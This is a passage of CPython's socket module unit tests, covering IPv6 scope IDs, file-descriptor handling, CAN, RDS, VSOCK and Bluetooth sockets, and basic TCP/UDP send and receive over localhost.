# Windows, Linux and Mac OS X allow nonexistent interface numbers here.
ifindex = 42
((*_, sockaddr),) = socket.getaddrinfo(
'ff02::1de:c0:face:8D%' + str(ifindex),
1234, socket.AF_INET6,
socket.SOCK_DGRAM,
socket.IPPROTO_UDP
)
# Note missing interface name part in IPv6 address
self.assertEqual(sockaddr, ('ff02::1de:c0:face:8d', 1234, 0, ifindex))
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipIf(sys.platform == 'win32', 'does not work on Windows')
@unittest.skipIf(AIX, 'Symbolic scope id does not work')
@unittest.skipUnless(hasattr(socket, 'if_nameindex'), "test needs socket.if_nameindex()")
def test_getnameinfo_ipv6_scopeid_symbolic(self):
# Just pick up any network interface.
(ifindex, test_interface) = socket.if_nameindex()[0]
sockaddr = ('ff02::1de:c0:face:8D', 1234, 0, ifindex) # Note capital letter `D`.
nameinfo = socket.getnameinfo(sockaddr, socket.NI_NUMERICHOST | socket.NI_NUMERICSERV)
self.assertEqual(nameinfo, ('ff02::1de:c0:face:8d%' + test_interface, '1234'))
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless(sys.platform == 'win32',
'Numeric scope id does not work or is undocumented')
def test_getnameinfo_ipv6_scopeid_numeric(self):
# Also works on Linux (undocumented), but does not work on Mac OS X
# Windows and Linux allow nonexistent interface numbers here.
ifindex = 42
sockaddr = ('ff02::1de:c0:face:8D', 1234, 0, ifindex) # Note capital letter `D`.
nameinfo = socket.getnameinfo(sockaddr, socket.NI_NUMERICHOST | socket.NI_NUMERICSERV)
self.assertEqual(nameinfo, ('ff02::1de:c0:face:8d%' + str(ifindex), '1234'))
def test_str_for_enums(self):
# Make sure that the AF_* and SOCK_* constants have enum-like string
# reprs.
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
self.assertEqual(str(s.family), 'AddressFamily.AF_INET')
self.assertEqual(str(s.type), 'SocketKind.SOCK_STREAM')
def test_socket_consistent_sock_type(self):
SOCK_NONBLOCK = getattr(socket, 'SOCK_NONBLOCK', 0)
SOCK_CLOEXEC = getattr(socket, 'SOCK_CLOEXEC', 0)
sock_type = socket.SOCK_STREAM | SOCK_NONBLOCK | SOCK_CLOEXEC
with socket.socket(socket.AF_INET, sock_type) as s:
self.assertEqual(s.type, socket.SOCK_STREAM)
s.settimeout(1)
self.assertEqual(s.type, socket.SOCK_STREAM)
s.settimeout(0)
self.assertEqual(s.type, socket.SOCK_STREAM)
s.setblocking(True)
self.assertEqual(s.type, socket.SOCK_STREAM)
s.setblocking(False)
self.assertEqual(s.type, socket.SOCK_STREAM)
def test_unknown_socket_family_repr(self):
# Test that when created with a family that's not one of the known
# AF_*/SOCK_* constants, socket.family just returns the number.
#
# To do this we fool socket.socket into believing it already has an
# open fd because on this path it doesn't actually verify the family and
# type and populates the socket object.
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
fd = sock.detach()
unknown_family = max(socket.AddressFamily.__members__.values()) + 1
unknown_type = max(
kind
for name, kind in socket.SocketKind.__members__.items()
if name not in {'SOCK_NONBLOCK', 'SOCK_CLOEXEC'}
) + 1
with socket.socket(
family=unknown_family, type=unknown_type, proto=23,
fileno=fd) as s:
self.assertEqual(s.family, unknown_family)
self.assertEqual(s.type, unknown_type)
# some OS like macOS ignore proto
self.assertIn(s.proto, {0, 23})
@unittest.skipUnless(hasattr(os, 'sendfile'), 'test needs os.sendfile()')
def test__sendfile_use_sendfile(self):
class File:
def __init__(self, fd):
self.fd = fd
def fileno(self):
return self.fd
with socket.socket() as sock:
fd = os.open(os.curdir, os.O_RDONLY)
os.close(fd)
with self.assertRaises(socket._GiveupOnSendfile):
sock._sendfile_use_sendfile(File(fd))
with self.assertRaises(OverflowError):
sock._sendfile_use_sendfile(File(2**1000))
with self.assertRaises(TypeError):
sock._sendfile_use_sendfile(File(None))
def _test_socket_fileno(self, s, family, stype):
self.assertEqual(s.family, family)
self.assertEqual(s.type, stype)
fd = s.fileno()
s2 = socket.socket(fileno=fd)
self.addCleanup(s2.close)
# detach old fd to avoid double close
s.detach()
self.assertEqual(s2.family, family)
self.assertEqual(s2.type, stype)
self.assertEqual(s2.fileno(), fd)
def test_socket_fileno(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(s.close)
s.bind((socket_helper.HOST, 0))
self._test_socket_fileno(s, socket.AF_INET, socket.SOCK_STREAM)
if hasattr(socket, "SOCK_DGRAM"):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
s.bind((socket_helper.HOST, 0))
self._test_socket_fileno(s, socket.AF_INET, socket.SOCK_DGRAM)
if socket_helper.IPV6_ENABLED:
s = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
self.addCleanup(s.close)
s.bind((socket_helper.HOSTv6, 0, 0, 0))
self._test_socket_fileno(s, socket.AF_INET6, socket.SOCK_STREAM)
if hasattr(socket, "AF_UNIX"):
tmpdir = tempfile.mkdtemp()
self.addCleanup(shutil.rmtree, tmpdir)
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
self.addCleanup(s.close)
try:
s.bind(os.path.join(tmpdir, 'socket'))
except PermissionError:
pass
else:
self._test_socket_fileno(s, socket.AF_UNIX,
socket.SOCK_STREAM)
def test_socket_fileno_rejects_float(self):
with self.assertRaises(TypeError):
socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=42.5)
def test_socket_fileno_rejects_other_types(self):
with self.assertRaises(TypeError):
socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno="foo")
def test_socket_fileno_rejects_invalid_socket(self):
with self.assertRaisesRegex(ValueError, "negative file descriptor"):
socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=-1)
@unittest.skipIf(os.name == "nt", "Windows disallows -1 only")
def test_socket_fileno_rejects_negative(self):
with self.assertRaisesRegex(ValueError, "negative file descriptor"):
socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=-42)
def test_socket_fileno_requires_valid_fd(self):
WSAENOTSOCK = 10038
with self.assertRaises(OSError) as cm:
socket.socket(fileno=os_helper.make_bad_fd())
self.assertIn(cm.exception.errno, (errno.EBADF, WSAENOTSOCK))
with self.assertRaises(OSError) as cm:
socket.socket(
socket.AF_INET,
socket.SOCK_STREAM,
fileno=os_helper.make_bad_fd())
self.assertIn(cm.exception.errno, (errno.EBADF, WSAENOTSOCK))
def test_socket_fileno_requires_socket_fd(self):
with tempfile.NamedTemporaryFile() as afile:
with self.assertRaises(OSError):
socket.socket(fileno=afile.fileno())
with self.assertRaises(OSError) as cm:
socket.socket(
socket.AF_INET,
socket.SOCK_STREAM,
fileno=afile.fileno())
self.assertEqual(cm.exception.errno, errno.ENOTSOCK)
@unittest.skipUnless(HAVE_SOCKET_CAN, 'SocketCan required for this test.')
class BasicCANTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_CAN
socket.PF_CAN
socket.CAN_RAW
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def testBCMConstants(self):
socket.CAN_BCM
# opcodes
socket.CAN_BCM_TX_SETUP # create (cyclic) transmission task
socket.CAN_BCM_TX_DELETE # remove (cyclic) transmission task
socket.CAN_BCM_TX_READ # read properties of (cyclic) transmission task
socket.CAN_BCM_TX_SEND # send one CAN frame
socket.CAN_BCM_RX_SETUP # create RX content filter subscription
socket.CAN_BCM_RX_DELETE # remove RX content filter subscription
socket.CAN_BCM_RX_READ # read properties of RX content filter subscription
socket.CAN_BCM_TX_STATUS # reply to TX_READ request
socket.CAN_BCM_TX_EXPIRED # notification on performed transmissions (count=0)
socket.CAN_BCM_RX_STATUS # reply to RX_READ request
socket.CAN_BCM_RX_TIMEOUT # cyclic message is absent
socket.CAN_BCM_RX_CHANGED # updated CAN frame (detected content change)
# flags
socket.CAN_BCM_SETTIMER
socket.CAN_BCM_STARTTIMER
socket.CAN_BCM_TX_COUNTEVT
socket.CAN_BCM_TX_ANNOUNCE
socket.CAN_BCM_TX_CP_CAN_ID
socket.CAN_BCM_RX_FILTER_ID
socket.CAN_BCM_RX_CHECK_DLC
socket.CAN_BCM_RX_NO_AUTOTIMER
socket.CAN_BCM_RX_ANNOUNCE_RESUME
socket.CAN_BCM_TX_RESET_MULTI_IDX
socket.CAN_BCM_RX_RTR_FRAME
def testCreateSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
pass
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def testCreateBCMSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_BCM) as s:
pass
def testBindAny(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
address = ('', )
s.bind(address)
self.assertEqual(s.getsockname(), address)
def testTooLongInterfaceName(self):
# most systems limit IFNAMSIZ to 16, take 1024 to be sure
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
self.assertRaisesRegex(OSError, 'interface name too long',
s.bind, ('x' * 1024,))
@unittest.skipUnless(hasattr(socket, "CAN_RAW_LOOPBACK"),
'socket.CAN_RAW_LOOPBACK required for this test.')
def testLoopback(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
for loopback in (0, 1):
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_LOOPBACK,
loopback)
self.assertEqual(loopback,
s.getsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_LOOPBACK))
@unittest.skipUnless(hasattr(socket, "CAN_RAW_FILTER"),
'socket.CAN_RAW_FILTER required for this test.')
def testFilter(self):
can_id, can_mask = 0x200, 0x700
can_filter = struct.pack("=II", can_id, can_mask)
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, can_filter)
self.assertEqual(can_filter,
s.getsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, 8))
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, bytearray(can_filter))
@unittest.skipUnless(HAVE_SOCKET_CAN, 'SocketCan required for this test.')
class CANTest(ThreadedCANSocketTest):
def __init__(self, methodName='runTest'):
ThreadedCANSocketTest.__init__(self, methodName=methodName)
@classmethod
def build_can_frame(cls, can_id, data):
"""Build a CAN frame."""
can_dlc = len(data)
data = data.ljust(8, b'\x00')
return struct.pack(cls.can_frame_fmt, can_id, can_dlc, data)
@classmethod
def dissect_can_frame(cls, frame):
"""Dissect a CAN frame."""
can_id, can_dlc, data = struct.unpack(cls.can_frame_fmt, frame)
return (can_id, can_dlc, data[:can_dlc])
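    # Hedged illustration of the two helpers above (can_frame_fmt is defined
    # elsewhere in this module and is assumed to mirror the Linux
    # struct can_frame layout of (can_id, can_dlc, padding, data[8])):
    #
    #   frame = CANTest.build_can_frame(0x123, b'\x01\x02')
    #   can_id, can_dlc, data = CANTest.dissect_can_frame(frame)
    #   # can_id == 0x123, can_dlc == 2, data == b'\x01\x02'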
def testSendFrame(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
self.assertEqual(addr[0], self.interface)
def _testSendFrame(self):
self.cf = self.build_can_frame(0x00, b'\x01\x02\x03\x04\x05')
self.cli.send(self.cf)
def testSendMaxFrame(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
def _testSendMaxFrame(self):
self.cf = self.build_can_frame(0x00, b'\x07' * 8)
self.cli.send(self.cf)
def testSendMultiFrames(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf1, cf)
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf2, cf)
def _testSendMultiFrames(self):
self.cf1 = self.build_can_frame(0x07, b'\x44\x33\x22\x11')
self.cli.send(self.cf1)
self.cf2 = self.build_can_frame(0x12, b'\x99\x22\x33')
self.cli.send(self.cf2)
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def _testBCM(self):
cf, addr = self.cli.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
can_id, can_dlc, data = self.dissect_can_frame(cf)
self.assertEqual(self.can_id, can_id)
self.assertEqual(self.data, data)
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def testBCM(self):
bcm = socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_BCM)
self.addCleanup(bcm.close)
bcm.connect((self.interface,))
self.can_id = 0x123
self.data = bytes([0xc0, 0xff, 0xee])
self.cf = self.build_can_frame(self.can_id, self.data)
opcode = socket.CAN_BCM_TX_SEND
flags = 0
count = 0
ival1_seconds = ival1_usec = ival2_seconds = ival2_usec = 0
bcm_can_id = 0x0222
nframes = 1
assert len(self.cf) == 16
header = struct.pack(self.bcm_cmd_msg_fmt,
opcode,
flags,
count,
ival1_seconds,
ival1_usec,
ival2_seconds,
ival2_usec,
bcm_can_id,
nframes,
)
header_plus_frame = header + self.cf
bytes_sent = bcm.send(header_plus_frame)
self.assertEqual(bytes_sent, len(header_plus_frame))
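        # Hedged sketch of the BCM message layout sent above (bcm_cmd_msg_fmt
        # is defined elsewhere in this module and is assumed to mirror
        # struct bcm_msg_head):
        #
        #   [ bcm_msg_head: opcode, flags, count, ival1, ival2, can_id, nframes ]
        #   [ struct can_frame * nframes                                        ]
        #
        # With opcode CAN_BCM_TX_SEND and nframes == 1, the kernel transmits a
        # single frame, so send() should accept header + frame in full.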
@unittest.skipUnless(HAVE_SOCKET_CAN_ISOTP, 'CAN ISOTP required for this test.')
class ISOTPTest(unittest.TestCase):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.interface = "vcan0"
def testCrucialConstants(self):
socket.AF_CAN
socket.PF_CAN
socket.CAN_ISOTP
socket.SOCK_DGRAM
def testCreateSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
pass
@unittest.skipUnless(hasattr(socket, "CAN_ISOTP"),
'socket.CAN_ISOTP required for this test.')
def testCreateISOTPSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP) as s:
pass
def testTooLongInterfaceName(self):
# most systems limit IFNAMSIZ to 16, take 1024 to be sure
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP) as s:
with self.assertRaisesRegex(OSError, 'interface name too long'):
s.bind(('x' * 1024, 1, 2))
def testBind(self):
try:
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP) as s:
addr = self.interface, 0x123, 0x456
s.bind(addr)
self.assertEqual(s.getsockname(), addr)
except OSError as e:
if e.errno == errno.ENODEV:
self.skipTest('network interface `%s` does not exist' %
self.interface)
else:
raise
@unittest.skipUnless(HAVE_SOCKET_CAN_J1939, 'CAN J1939 required for this test.')
class J1939Test(unittest.TestCase):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.interface = "vcan0"
@unittest.skipUnless(hasattr(socket, "CAN_J1939"),
'socket.CAN_J1939 required for this test.')
def testJ1939Constants(self):
socket.CAN_J1939
socket.J1939_MAX_UNICAST_ADDR
socket.J1939_IDLE_ADDR
socket.J1939_NO_ADDR
socket.J1939_NO_NAME
socket.J1939_PGN_REQUEST
socket.J1939_PGN_ADDRESS_CLAIMED
socket.J1939_PGN_ADDRESS_COMMANDED
socket.J1939_PGN_PDU1_MAX
socket.J1939_PGN_MAX
socket.J1939_NO_PGN
# J1939 socket options
socket.SO_J1939_FILTER
socket.SO_J1939_PROMISC
socket.SO_J1939_SEND_PRIO
socket.SO_J1939_ERRQUEUE
socket.SCM_J1939_DEST_ADDR
socket.SCM_J1939_DEST_NAME
socket.SCM_J1939_PRIO
socket.SCM_J1939_ERRQUEUE
socket.J1939_NLA_PAD
socket.J1939_NLA_BYTES_ACKED
socket.J1939_EE_INFO_NONE
socket.J1939_EE_INFO_TX_ABORT
socket.J1939_FILTER_MAX
@unittest.skipUnless(hasattr(socket, "CAN_J1939"),
'socket.CAN_J1939 required for this test.')
def testCreateJ1939Socket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_J1939) as s:
pass
def testBind(self):
try:
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_J1939) as s:
addr = self.interface, socket.J1939_NO_NAME, socket.J1939_NO_PGN, socket.J1939_NO_ADDR
s.bind(addr)
self.assertEqual(s.getsockname(), addr)
except OSError as e:
if e.errno == errno.ENODEV:
self.skipTest('network interface `%s` does not exist' %
self.interface)
else:
raise
@unittest.skipUnless(HAVE_SOCKET_RDS, 'RDS sockets required for this test.')
class BasicRDSTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_RDS
socket.PF_RDS
def testCreateSocket(self):
with socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0) as s:
pass
def testSocketBufferSize(self):
bufsize = 16384
with socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0) as s:
s.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, bufsize)
s.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, bufsize)
@unittest.skipUnless(HAVE_SOCKET_RDS, 'RDS sockets required for this test.')
class RDSTest(ThreadedRDSSocketTest):
def __init__(self, methodName='runTest'):
ThreadedRDSSocketTest.__init__(self, methodName=methodName)
def setUp(self):
super().setUp()
self.evt = threading.Event()
def testSendAndRecv(self):
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
self.assertEqual(self.cli_addr, addr)
def _testSendAndRecv(self):
self.data = b'spam'
self.cli.sendto(self.data, 0, (HOST, self.port))
def testPeek(self):
data, addr = self.serv.recvfrom(self.bufsize, socket.MSG_PEEK)
self.assertEqual(self.data, data)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
def _testPeek(self):
self.data = b'spam'
self.cli.sendto(self.data, 0, (HOST, self.port))
@requireAttrs(socket.socket, 'recvmsg')
def testSendAndRecvMsg(self):
data, ancdata, msg_flags, addr = self.serv.recvmsg(self.bufsize)
self.assertEqual(self.data, data)
@requireAttrs(socket.socket, 'sendmsg')
def _testSendAndRecvMsg(self):
self.data = b'hello ' * 10
self.cli.sendmsg([self.data], (), 0, (HOST, self.port))
def testSendAndRecvMulti(self):
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data1, data)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data2, data)
def _testSendAndRecvMulti(self):
self.data1 = b'bacon'
self.cli.sendto(self.data1, 0, (HOST, self.port))
self.data2 = b'egg'
self.cli.sendto(self.data2, 0, (HOST, self.port))
def testSelect(self):
r, w, x = select.select([self.serv], [], [], 3.0)
self.assertIn(self.serv, r)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
def _testSelect(self):
self.data = b'select'
self.cli.sendto(self.data, 0, (HOST, self.port))
@unittest.skipUnless(HAVE_SOCKET_QIPCRTR,
'QIPCRTR sockets required for this test.')
class BasicQIPCRTRTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_QIPCRTR
def testCreateSocket(self):
with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as s:
pass
def testUnbound(self):
with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as s:
self.assertEqual(s.getsockname()[1], 0)
def testBindSock(self):
with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as s:
socket_helper.bind_port(s, host=s.getsockname()[0])
self.assertNotEqual(s.getsockname()[1], 0)
def testInvalidBindSock(self):
with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as s:
self.assertRaises(OSError, socket_helper.bind_port, s, host=-2)
def testAutoBindSock(self):
with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as s:
s.connect((123, 123))
self.assertNotEqual(s.getsockname()[1], 0)
@unittest.skipIf(fcntl is None, "need fcntl")
@unittest.skipUnless(HAVE_SOCKET_VSOCK,
'VSOCK sockets required for this test.')
class BasicVSOCKTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_VSOCK
def testVSOCKConstants(self):
socket.SO_VM_SOCKETS_BUFFER_SIZE
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE
socket.VMADDR_CID_ANY
socket.VMADDR_PORT_ANY
socket.VMADDR_CID_HOST
socket.VM_SOCKETS_INVALID_VERSION
socket.IOCTL_VM_SOCKETS_GET_LOCAL_CID
def testCreateSocket(self):
with socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM) as s:
pass
def testSocketBufferSize(self):
with socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM) as s:
orig_max = s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE)
orig = s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_SIZE)
orig_min = s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE)
s.setsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE, orig_max * 2)
s.setsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_SIZE, orig * 2)
s.setsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE, orig_min * 2)
self.assertEqual(orig_max * 2,
s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE))
self.assertEqual(orig * 2,
s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_SIZE))
self.assertEqual(orig_min * 2,
s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE))
@unittest.skipUnless(HAVE_SOCKET_BLUETOOTH,
'Bluetooth sockets required for this test.')
class BasicBluetoothTest(unittest.TestCase):
def testBluetoothConstants(self):
socket.BDADDR_ANY
socket.BDADDR_LOCAL
socket.AF_BLUETOOTH
socket.BTPROTO_RFCOMM
if sys.platform != "win32":
socket.BTPROTO_HCI
socket.SOL_HCI
socket.BTPROTO_L2CAP
if not sys.platform.startswith("freebsd"):
socket.BTPROTO_SCO
def testCreateRfcommSocket(self):
with socket.socket(socket.AF_BLUETOOTH, socket.SOCK_STREAM, socket.BTPROTO_RFCOMM) as s:
pass
@unittest.skipIf(sys.platform == "win32", "windows does not support L2CAP sockets")
def testCreateL2capSocket(self):
with socket.socket(socket.AF_BLUETOOTH, socket.SOCK_SEQPACKET, socket.BTPROTO_L2CAP) as s:
pass
@unittest.skipIf(sys.platform == "win32", "windows does not support HCI sockets")
def testCreateHciSocket(self):
with socket.socket(socket.AF_BLUETOOTH, socket.SOCK_RAW, socket.BTPROTO_HCI) as s:
pass
@unittest.skipIf(sys.platform == "win32" or sys.platform.startswith("freebsd"),
"windows and freebsd do not support SCO sockets")
def testCreateScoSocket(self):
with socket.socket(socket.AF_BLUETOOTH, socket.SOCK_SEQPACKET, socket.BTPROTO_SCO) as s:
pass
class BasicTCPTest(SocketConnectedTest):
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def testRecv(self):
# Testing large receive over TCP
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, MSG)
def _testRecv(self):
self.serv_conn.send(MSG)
def testOverFlowRecv(self):
# Testing receive in chunks over TCP
seg1 = self.cli_conn.recv(len(MSG) - 3)
seg2 = self.cli_conn.recv(1024)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testOverFlowRecv(self):
self.serv_conn.send(MSG)
def testRecvFrom(self):
# Testing large recvfrom() over TCP
msg, addr = self.cli_conn.recvfrom(1024)
self.assertEqual(msg, MSG)
def _testRecvFrom(self):
self.serv_conn.send(MSG)
def testOverFlowRecvFrom(self):
# Testing recvfrom() in chunks over TCP
seg1, addr = self.cli_conn.recvfrom(len(MSG)-3)
seg2, addr = self.cli_conn.recvfrom(1024)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testOverFlowRecvFrom(self):
self.serv_conn.send(MSG)
def testSendAll(self):
# Testing sendall() with a 2048 byte string over TCP
msg = b''
        while True:
read = self.cli_conn.recv(1024)
if not read:
break
msg += read
self.assertEqual(msg, b'f' * 2048)
def _testSendAll(self):
big_chunk = b'f' * 2048
self.serv_conn.sendall(big_chunk)
def testFromFd(self):
# Testing fromfd()
fd = self.cli_conn.fileno()
sock = socket.fromfd(fd, socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
self.assertIsInstance(sock, socket.socket)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testFromFd(self):
self.serv_conn.send(MSG)
def testDup(self):
# Testing dup()
sock = self.cli_conn.dup()
self.addCleanup(sock.close)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testDup(self):
self.serv_conn.send(MSG)
def testShutdown(self):
# Testing shutdown()
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, MSG)
# wait for _testShutdown to finish: on OS X, when the server
# closes the connection the client also becomes disconnected,
# and the client's shutdown call will fail. (Issue #4397.)
self.done.wait()
def _testShutdown(self):
self.serv_conn.send(MSG)
self.serv_conn.shutdown(2)
testShutdown_overflow = support.cpython_only(testShutdown)
@support.cpython_only
def _testShutdown_overflow(self):
import _testcapi
self.serv_conn.send(MSG)
# Issue 15989
self.assertRaises(OverflowError, self.serv_conn.shutdown,
_testcapi.INT_MAX + 1)
self.assertRaises(OverflowError, self.serv_conn.shutdown,
2 + (_testcapi.UINT_MAX + 1))
self.serv_conn.shutdown(2)
def testDetach(self):
# Testing detach()
fileno = self.cli_conn.fileno()
f = self.cli_conn.detach()
self.assertEqual(f, fileno)
# cli_conn cannot be used anymore...
self.assertTrue(self.cli_conn._closed)
self.assertRaises(OSError, self.cli_conn.recv, 1024)
self.cli_conn.close()
# ...but we can create another socket using the (still open)
# file descriptor
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=f)
self.addCleanup(sock.close)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testDetach(self):
self.serv_conn.send(MSG)
class BasicUDPTest(ThreadedUDPSocketTest):
def __init__(self, methodName='runTest'):
ThreadedUDPSocketTest.__init__(self, methodName=methodName)
def testSendtoAndRecv(self):
        # Testing sendto() and recv() over UDP
msg = self.serv.recv(len(MSG))
self.assertEqual(msg, MSG)
def _testSendtoAndRecv(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
def testRecvFrom(self):
# Testing recvfrom() over UDP
msg, addr = self.serv.recvfrom(len(MSG))
self.assertEqual(msg, MSG)
def _testRecvFrom(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
def testRecvFromNegative(self):
# Negative lengths passed to recvfrom should give ValueError.
self.assertRaises(ValueError, self.serv.recvfrom, -1)
def _testRecvFromNegative(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
class BasicUDPLITETest(ThreadedUDPLITESocketTest):
def __init__(self, methodName='runTest'):
ThreadedUDPLITESocketTest.__init__(self, methodName=methodName)
def testSendtoAndRecv(self):
        # Testing sendto() and recv() over UDPLITE
msg = self.serv.recv(len(MSG))
self.assertEqual(msg, MSG)
def _testSendtoAndRecv(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
def testRecvFrom(self):
# Testing recvfrom() over UDPLITE
msg, addr = self.serv.recvfrom(len(MSG))
self.assertEqual(msg, MSG)
def _testRecvFrom(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
def testRecvFromNegative(self):
# Negative lengths passed to recvfrom should give ValueError.
self.assertRaises(ValueError, self.serv.recvfrom, -1)
def _testRecvFromNegative(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
# Tests for the sendmsg()/recvmsg() interface. Where possible, the
# same test code is used with different families and types of socket
# (e.g. stream, datagram), and tests using recvmsg() are repeated
# using recvmsg_into().
#
# The generic test classes such as SendmsgTests and
# RecvmsgGenericTests inherit from SendrecvmsgBase and expect to be
# supplied with sockets cli_sock and serv_sock representing the
# client's and the server's end of the connection respectively, and
# attributes cli_addr and serv_addr holding their (numeric where
# appropriate) addresses.
#
# The final concrete test classes combine these with subclasses of
# SocketTestBase which set up client and server sockets of a specific
# type, and with subclasses of SendrecvmsgBase such as
# SendrecvmsgDgramBase and SendrecvmsgConnectedBase which map these
# sockets to cli_sock and serv_sock and override the methods and
# attributes of SendrecvmsgBase to fill in destination addresses if
# needed when sending, check for specific flags in msg_flags, etc.
#
# RecvmsgIntoMixin provides a version of doRecvmsg() implemented using
# recvmsg_into().
# XXX: like the other datagram (UDP) tests in this module, the code
# here assumes that datagram delivery on the local machine will be
# reliable.
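# Illustration only (a hedged sketch; the class names are assumed for the
# example and the real combinations are defined further down in this module):
# a concrete, runnable test class is assembled roughly as
#
#   class SendmsgUDPTest(SendmsgConnectionlessTests, SendrecvmsgUDPTestBase):
#       pass
#
# where the Sendrecvmsg*TestBase side supplies cli_sock/serv_sock and their
# addresses, and the generic mixin side supplies the actual test methods.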
class SendrecvmsgBase(ThreadSafeCleanupTestCase):
# Base class for sendmsg()/recvmsg() tests.
# Time in seconds to wait before considering a test failed, or
# None for no timeout. Not all tests actually set a timeout.
fail_timeout = support.LOOPBACK_TIMEOUT
def setUp(self):
self.misc_event = threading.Event()
super().setUp()
def sendToServer(self, msg):
